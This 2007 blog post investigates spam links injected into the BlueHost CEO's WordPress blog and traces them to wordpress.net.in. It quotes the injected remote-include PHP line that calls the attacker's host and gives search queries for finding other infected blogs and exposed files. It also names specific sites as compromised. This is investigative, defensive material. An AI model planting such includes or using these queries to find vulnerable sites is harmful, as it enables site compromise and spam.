Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.
Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.
Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in
I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.
Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.
Lookup for howardowens.com
The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.
Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).
Tracking the spam sources.
Viewing mattheaton.com html sources I found some hint and start searching for xanax intext:id=\”goro\”. Google return 2 results for this query.
- 1. Wordpress Support
- php get footer adding spam code?
- 2. elijahzarwan.net
- div id=”Goro” (nice headline)
Both site suggest same type of php injection methods
include('http://wordpress.net.in/statcounter.php');
The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from http://wordpress.net.in/[random]/ random = 1 - 9.
Raw whois for wordpress.net.in
Domain ID:D2500581-AFIN Domain Name:WORDPRESS.NET.IN Created On:22-Apr-2007 12:01:55 UTC Last Updated On:22-Jun-2007 02:26:40 UTC Expiration Date:22-Apr-2008 12:01:55 UTC Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN) Status:OK Registrant ID:DI_4275224 Registrant Name:Mick Jagger Registrant Organization:N/A Registrant Street1:1 Red Square Registrant City:Moscow Registrant State/Province:Massachusetts Registrant Postal Code:123592 Registrant Country:RU Registrant Phone:+007.7581235641 Registrant Email:mkk.goro@bk.ru Admin ID:DI_4275224 Admin Name:Mick Jagger Admin Organization:N/A Admin Street1:1 Red Square Admin City:Moscow Admin State/Province:Massachusetts Admin Postal Code:123592 Admin Country:RU Admin Phone:+007.7581235641 Admin Email:mkk.goro@bk.ru Tech ID:DI_4275224 Tech Name:Mick Jagger Tech Organization:N/A Tech Street1:1 Red Square Tech City:Moscow Tech State/Province:Massachusetts Tech Postal Code:123592 Tech Country:RU Tech Phone:+007.7581235641 Tech Email:mkk.goro@bk.ru Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
Note: The registrant address on 1 red square is a famous restaurant in Moscow.
Its pretty obvious that wordpress.net.in belong to registrar in India.
Live example wordpress.net.in injection
Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.
- 1 Evan Morris
- Wordpress 2.0.6 | url | screenshot
- 2 carwax
- Wordpress 1.5.2 | url | screenshot
- 3 aabenthus.biz
- Wordpress 2.0.x | url | screenshot
- 4 mythinger.com
- Wordpress 2.0.2 | url | screenshot
- 5 classicalanglican.net
- Wordpress 2.0.2 | url | screenshot
- 6 echo9er.net
- WordPress 1.5.1 | url | screenshot
- 7 boyarick.com
- Wordpress 2.0.2 | url | screenshot
Google Directory search for class-mail.php
Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums
- jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
- floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.
Hiding from search engine Spiders
First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.
- http://web.archive.org/web/*/http://www.howardowens.com
- http://web.archive.org/web/*/http://www.mattheaton.com
Out of boredom I cloaked myself as the following agents.
- Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
- Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
- Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
- Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.
Summary
bits & bytes from this accident we knew that
- Most of the site inject are running on wordpress 2.0.6 & below
- allow_furl_open is set to true for this injection to work
- Most of the blogs owner is unaware about the spams links (cloacking)
Checkout Murray access log, it will give you some ideas with the remote injections methods.
Update
- Dec 03 2007
- All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.
- Dec 04 2007
- Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12) - Dec 11 2007
- Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.
Related Post
- How to Removed wordpress.net.in Spam Injection
- Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II
External Links
- Bluehost Hostmonster CEO’s blog
- DNS Lookup results for wordpress.net.in
- Aboutus.org wiki on MattHeaton.com
- National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
- Murray’s Blog My Wordpress Cracked
- pseudo-flaw - more random wordpress blogs owned by seo spammers
No Responses to “Matt Heaton BlueHost HostMonster CEO Official Blog Hacked”
The following "Code" are designed to protect you and other users of the site.
In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines. Feel free to engage, ask questions, and tell us what you are thinking! Regular and insightful comments are most welcomed.
be the first to comment.